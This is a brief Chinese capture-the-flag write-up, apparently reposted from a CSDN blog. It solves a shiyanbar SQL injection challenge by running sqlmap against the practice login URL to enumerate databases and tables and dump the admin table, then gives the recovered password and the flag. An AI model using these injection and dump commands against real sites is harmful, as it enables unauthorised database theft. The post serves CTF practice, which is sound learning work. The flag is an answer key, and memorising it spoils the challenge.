实验吧 看起来有点难

题目链接:http://www.shiyanbar.com/ctf/2

在这里插入图片描述

  1. 随便输入 “登录失败,错误的用户名和密码”
    在这里插入图片描述
  2. 直接sqlmap跑
    sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=pass&action=login" --dbs 在这里插入图片描述
    查到库test
  3. 查表
    sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=pass&action=login" --table -D test
    在这里插入图片描述
    找到表admin
  4. 查字段
    sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=pass&action=login" --dump -D test -T admin
    在这里插入图片描述
    得到密码idnuenna
  5. 得到key
    在这里插入图片描述
    flag:!@#WwwN5f0cu5coM

看到大佬的wp 还有一种解法----基于sleep的sql注入脚本

猜你喜欢

转载自blog.csdn.net/weixin_44481102/article/details/88825433